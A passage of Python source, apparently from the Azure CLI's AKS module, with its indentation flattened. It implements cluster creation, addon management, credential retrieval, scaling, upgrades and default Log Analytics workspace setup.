if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError('Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
    if not (enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
api_server_access_profile=api_server_access_profile,
identity=identity
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
                                   'you can manually grant permission to the identity named <CLUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the node pool name, or use the "az aks nodepool" command to scale a node pool.')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if (update_autoscaler != 1 and not update_lb_profile and
not attach_acr and
not detach_acr and
api_server_authorized_ip_ranges is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--dettach-acr" or'
'"--"api-server-authorized-ip-ranges')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, **kwargs):
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
    using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
    :param endpoint_type: The endpoint type to be used for an Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
    using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
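        # ADDONS maps the CLI-facing addon names (for example 'monitoring' or 'virtual-node')
        # to the addon-profile keys handled below (such as 'omsagent' and 'aciConnector').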
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.'.format(resource_group_name=resource_group_name))
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
    except Exception:  # pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
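# Worked example of the defaults computed above (editor's illustration; the subscription id is
# a placeholder): a resource group in "westcentralus" on the public cloud maps to workspace
# region "eastus" / code "EUS", so the default workspace resource id becomes
# /subscriptions/<subscription-id>/resourceGroups/DefaultResourceGroup-EUS/providers/
# Microsoft.OperationalInsights/workspaces/DefaultWorkspace-<subscription-id>-EUS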
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
